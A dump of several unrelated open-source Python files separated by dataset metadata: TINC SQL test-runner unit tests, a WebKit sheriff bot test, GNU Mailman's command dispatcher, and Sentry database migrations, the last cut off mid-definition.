# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 1)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_no_gpdiff_no_ans_file(self):
"""
Test whether we construct a test for sqls with no ans files when gpdiff is turned off
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseNoGpdiffNoAnsFile)
# Store all test names in a list
test_case_list = []
for temp in test_suite._tests:
test_case_list.append(temp.name)
# Verify that other sql files with ans files and explicit method is in the list
self.assertTrue('MockSQLTestCaseNoGpdiffNoAnsFile.test_explicit_test_method' in test_case_list)
self.assertTrue('MockSQLTestCaseNoGpdiffNoAnsFile.test_query02' in test_case_list)
# Verify that test_query_no_ans_file is there, even though the sql file is there without the ans file
self.assertTrue('MockSQLTestCaseNoGpdiffNoAnsFile.test_query_no_ans_file' in test_case_list)
def test_run_generate_ans_file_class_variable(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseGenerateAns)
# Store all test names in a list
test_case_list = []
for temp in test_suite._tests:
test_case_list.append(temp.name)
# Verify that other sql files with ans files and explicit method is in the list
self.assertTrue('MockSQLTestCaseGenerateAns.test_explicit_test_method' in test_case_list)
self.assertTrue('MockSQLTestCaseGenerateAns.test_query02' in test_case_list)
# Verify that test_query_no_ans_file is also there, even though its ans file is not there
self.assertTrue('MockSQLTestCaseGenerateAns.test_query_no_ans_file' in test_case_list)
def test_run_incorrect_generate_ans_file_class_variable(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseIncorrectGenerateAns)
count = 0
for test in test_suite._tests:
if 'TINCTestCaseLoadFailure' in str(test):
count += 1
self.assertEquals(count, 1)
def test_run_sql_generate_ans(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseGenerateAns)
# Ans file that will be generated
ans_file = local_path("query_no_ans_file.ans")
# If ans file is there for some reason, remove it (not testing force here)
if os.path.exists(ans_file):
os.remove(ans_file)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseGenerateAns.test_query_no_ans_file":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
# Verify that ans file is generated
self.assertTrue(os.path.exists(local_path("setup.ans")))
self.assertTrue(os.path.exists(ans_file))
self.assertTrue(os.path.exists(local_path("teardown.ans")))
# Cleanup
os.remove(local_path("setup.ans"))
os.remove(ans_file)
os.remove(local_path("teardown.ans"))
def test_run_sql_force_generate_ans(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseForceGenerateAns)
# Ans file that will be generated
ans_file = local_path("query_no_ans_file.ans")
# Create the empty ans file to allow force to overwrite
open(ans_file, 'w').close()
self.assertTrue(os.path.getsize(ans_file) == 0)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseForceGenerateAns.test_query_no_ans_file":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
# Verify that ans file is there
self.assertTrue(os.path.exists(local_path("setup.ans")))
self.assertTrue(os.path.exists(ans_file))
self.assertTrue(os.path.exists(local_path("teardown.ans")))
# Verify that ans file size is greater than 0
self.assertTrue(os.path.getsize(ans_file) > 0)
# Cleanup
os.remove(local_path("setup.ans"))
os.remove(ans_file)
os.remove(local_path("teardown.ans"))
def test_run_sql_force_generate_ans_permission_denied(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseForceGenerateAns)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query04 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseForceGenerateAns.test_query04":
# query04.ans wouldn't be checked-out from perforce, so it would have no write operation allowed
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 1)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_run_sql_file(self):
test_case = MockSQLTestCase('test_query03')
if os.path.exists(test_case.get_out_dir()):
shutil.rmtree(test_case.get_out_dir())
# Default mode
test_case.run_sql_file(local_path('query03.sql'))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03.out')))
self.assertFalse(self._check_str_in_file('SET optimizer',
os.path.join(test_case.get_out_dir(), 'query03.sql')))
# Optimizer on mode
test_case.run_sql_file(local_path('query03.sql'), optimizer=True)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
self.assertTrue(self._check_str_in_file('SET optimizer=on;',
os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
# Optimizer off mode
test_case.run_sql_file(local_path('query03.sql'), optimizer=False)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(self._check_str_in_file('SET optimizer=off;',
os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
def test_run_sql_test_optimizer_on(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseWithOptimizerOn)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseWithOptimizerOn.test_query03":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
shutil.rmtree(test_case.get_out_dir())
def test_run_sql_test_optimizer_off(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseWithOptimizerOff)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to insolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseWithOptimizerOff.test_query03":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
shutil.rmtree(test_case.get_out_dir())
def test_run_sql_test_optimizer_both(self):
test_loader = tinctest.TINCTestLoader()
# For data provider test cases, we have to use loadTestsFromName, since loadTestsFromTestCase won't filter and expand
test_suite = test_loader.loadTestsFromName("mpp.models.regress.sql_related.regress_sql_test_case.regress_sql_test_case.MockSQLTestCaseWithOptimizerBoth")
# Find our desired test case in test_suite.
test_case = None
new_test_suite = tinctest.TINCTestSuite()
for temp in test_suite._tests:
if "MockSQLTestCaseWithOptimizerBoth.test_query03" in temp.name:
new_test_suite.addTest(temp)
temp.__class__.__unittest_skip__ = False
test_case = temp
self.assertIsNotNone(new_test_suite)
self.assertEquals(new_test_suite.countTestCases(), 2)
test_result = unittest.TestResult()
new_test_suite.run(test_result)
self.assertEqual(test_result.testsRun, 2)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
os.path.join(temp.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
shutil.rmtree(test_case.get_out_dir())
def _check_str_in_file(self, check_string, file_path):
with open(file_path, 'r') as f:
for line in f:
if check_string in line:
return True
return False
def test_run_sql_test_optimizer_minidump_on_failure(self):
"""
Test whether we gather minidumps on failures when the test is exeucted with optimizer on.
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromName('mpp.models.regress.sql_related.regress_sql_test_case.' + \
'regress_sql_test_case.' + \
'MockSQLTestCaseWithOptimizerOn.test_query02')
self.assertIsNotNone(test_suite)
self.assertTrue(len(test_suite._tests), 1)
test_result = None
test_case = None
for test in test_suite._tests:
test.__class__.__unittest_skip__ = False
test_case = test
if os.path.exists(test_case.get_out_dir()):
shutil.rmtree(test_case.get_out_dir())
with closing(_WritelnDecorator(StringIO())) as buffer:
tinc_test_runner = TINCTestRunner(stream = buffer, descriptions = True, verbosity = 1)
test_result = tinc_test_runner.run(test_suite)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
# Verify that we collect minidump on failure for optimizer execution mode
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_minidump.mdp')))
@unittest.skip("QAINF-999")
def test_run_sql_test_optimizer_minidump_on_failure2(self):
"""
Test whether we gather minidumps on failures when the test is exeucted with optimizer_mode both.
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromName('mpp.models.regress.sql_related.regress_sql_test_case.' + \
'regress_sql_test_case.' + \
'MockSQLTestCaseWithOptimizerBoth.test_query02')
self.assertIsNotNone(test_suite)
new_test_suite = tinctest.TINCTestSuite()
self.assertEquals(test_suite.countTestCases(), 2)
test_result = None
test_case = None
for test in test_suite._tests:
if 'test_query02_orca' in test.name:
test.__class__.__unittest_skip__ = False
test_case = test
new_test_suite.addTest(test)
self.assertIsNotNone(test_case)
if os.path.exists(test_case.get_out_dir()):
shutil.rmtree(test_case.get_out_dir())
with closing(_WritelnDecorator(StringIO())) as buffer:
tinc_test_runner = TINCTestRunner(stream = buffer, descriptions = True, verbosity = 1)
test_result = tinc_test_runner.run(new_test_suite)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
# Verify that we collect minidump on failure for optimizer execution mode
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_minidump.mdp')))
| apache-2.0 | 4,530,284,547,039,419,000 | 45.51871 | 161 | 0.644319 | false |
Observer-Wu/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/sheriff_unittest.py | 122 | 3783 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.common.net.buildbot import Builder
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.bot.sheriff import Sheriff
from webkitpy.tool.mocktool import MockTool
class MockSheriffBot(object):
name = "mock-sheriff-bot"
watchers = [
"[email protected]",
]
def run_webkit_patch(self, args):
return "Created bug https://bugs.webkit.org/show_bug.cgi?id=36936\n"
class SheriffTest(unittest.TestCase):
def test_post_blame_comment_on_bug(self):
def run():
sheriff = Sheriff(MockTool(), MockSheriffBot())
builders = [
Builder("Foo", None),
Builder("Bar", None),
]
commit_info = Mock()
commit_info.bug_id = lambda: None
commit_info.revision = lambda: 4321
# Should do nothing with no bug_id
sheriff.post_blame_comment_on_bug(commit_info, builders, [])
sheriff.post_blame_comment_on_bug(commit_info, builders, ["mock-test-1", "mock-test-2"])
# Should try to post a comment to the bug, but MockTool.bugs does nothing.
commit_info.bug_id = lambda: 1234
sheriff.post_blame_comment_on_bug(commit_info, builders, [])
sheriff.post_blame_comment_on_bug(commit_info, builders, ["mock-test-1"])
sheriff.post_blame_comment_on_bug(commit_info, builders, ["mock-test-1", "mock-test-2"])
expected_logs = u"""MOCK bug comment: bug_id=1234, cc=['[email protected]']
--- Begin comment ---
http://trac.webkit.org/changeset/4321 might have broken Foo and Bar
--- End comment ---
MOCK bug comment: bug_id=1234, cc=['[email protected]']
--- Begin comment ---
http://trac.webkit.org/changeset/4321 might have broken Foo and Bar
The following tests are not passing:
mock-test-1
--- End comment ---
MOCK bug comment: bug_id=1234, cc=['[email protected]']
--- Begin comment ---
http://trac.webkit.org/changeset/4321 might have broken Foo and Bar
The following tests are not passing:
mock-test-1
mock-test-2
--- End comment ---
"""
OutputCapture().assert_outputs(self, run, expected_logs=expected_logs)
| bsd-3-clause | 5,880,873,830,981,891,000 | 41.505618 | 100 | 0.708697 | false |
systers/mailman | src/mailman/bin/mailman.py | 3 | 3848 | # Copyright (C) 2009-2015 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""The 'mailman' command dispatcher."""
__all__ = [
'main',
]
import os
import argparse
from functools import cmp_to_key
from mailman.core.i18n import _
from mailman.core.initialize import initialize
from mailman.interfaces.command import ICLISubCommand
from mailman.utilities.modules import find_components
from mailman.version import MAILMAN_VERSION_FULL
from zope.interface.verify import verifyObject
def main():
"""The `mailman` command dispatcher."""
# Create the basic parser and add all globally common options.
parser = argparse.ArgumentParser(
description=_("""\
The GNU Mailman mailing list management system
Copyright 1998-2015 by the Free Software Foundation, Inc.
http://www.list.org
"""),
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'-v', '--version',
action='version', version=MAILMAN_VERSION_FULL,
help=_('Print this version string and exit'))
parser.add_argument(
'-C', '--config',
help=_("""\
Configuration file to use. If not given, the environment variable
MAILMAN_CONFIG_FILE is consulted and used if set. If neither are
given, a default configuration file is loaded."""))
# Look at all modules in the mailman.bin package and if they are prepared
# to add a subcommand, let them do so. I'm still undecided as to whether
# this should be pluggable or not. If so, then we'll probably have to
# partially parse the arguments now, then initialize the system, then find
# the plugins. Punt on this for now.
subparser = parser.add_subparsers(title='Commands')
subcommands = []
for command_class in find_components('mailman.commands', ICLISubCommand):
command = command_class()
verifyObject(ICLISubCommand, command)
subcommands.append(command)
# --help should display the subcommands by alphabetical order, except that
# 'mailman help' should be first.
def sort_function(command, other):
"""Sorting helper."""
if command.name == 'help':
return -1
elif other.name == 'help':
return 1
elif command.name < other.name:
return -1
elif command.name == other.name:
return 0
else:
assert command.name > other.name
return 1
subcommands.sort(key=cmp_to_key(sort_function))
for command in subcommands:
command_parser = subparser.add_parser(
command.name, help=_(command.__doc__))
command.add(parser, command_parser)
command_parser.set_defaults(func=command.process)
args = parser.parse_args()
if len(args.__dict__) <= 1:
# No arguments or subcommands were given.
parser.print_help()
parser.exit()
# Initialize the system. Honor the -C flag if given.
config_path = (None if args.config is None
else os.path.abspath(os.path.expanduser(args.config)))
initialize(config_path)
# Perform the subcommand option.
args.func(args)
| gpl-3.0 | 6,947,417,399,102,275,000 | 37.09901 | 78 | 0.671778 | false |
beeftornado/sentry | src/sentry/migrations/0066_alertrule_manager.py | 1 | 1754 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-04-15 23:27
from __future__ import unicode_literals
from django.db import migrations
import django.db.models.manager
class Migration(migrations.Migration):
# This flag is used to mark that a migration shouldn't be automatically run in
# production. We set this to True for operations that we think are risky and want
# someone from ops to run manually and monitor.
# General advice is that if in doubt, mark your migration as `is_dangerous`.
# Some things you should always mark as dangerous:
# - Large data migrations. Typically we want these to be run manually by ops so that
# they can be monitored. Since data migrations will now hold a transaction open
# this is even more important.
# - Adding columns to highly active tables, even ones that are NULL.
is_dangerous = False
# This flag is used to decide whether to run this migration in a transaction or not.
# By default we prefer to run in a transaction, but for migrations where you want
# to `CREATE INDEX CONCURRENTLY` this needs to be set to False. Typically you'll
# want to create an index concurrently when adding one to an existing table.
atomic = True
dependencies = [
('sentry', '0065_add_incident_status_method'),
]
operations = [
migrations.AlterModelOptions(
name='alertrule',
options={'base_manager_name': 'objects_with_snapshots', 'default_manager_name': 'objects_with_snapshots'},
),
migrations.AlterModelManagers(
name='alertrule',
managers=[
('objects_with_snapshots', django.db.models.manager.Manager()),
],
),
]
| bsd-3-clause | -6,759,195,421,218,852,000 | 39.790698 | 118 | 0.673318 | false |
llonchj/sentry | src/sentry/migrations/0085_auto__del_unique_project_slug__add_unique_project_slug_team.py | 36 | 23551 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing unique constraint on 'Project', fields ['slug']
db.delete_unique('sentry_project', ['slug'])
# Adding unique constraint on 'Project', fields ['slug', 'team']
db.create_unique('sentry_project', ['slug', 'team_id'])
def backwards(self, orm):
# Removing unique constraint on 'Project', fields ['slug', 'team']
db.delete_unique('sentry_project', ['slug', 'team_id'])
# Adding unique constraint on 'Project', fields ['slug']
db.create_unique('sentry_project', ['slug'])
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.affecteduserbygroup': {
'Meta': {'unique_together': "(('project', 'tuser', 'group'),)", 'object_name': 'AffectedUserByGroup'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'tuser': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.TrackedUser']", 'null': 'True'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
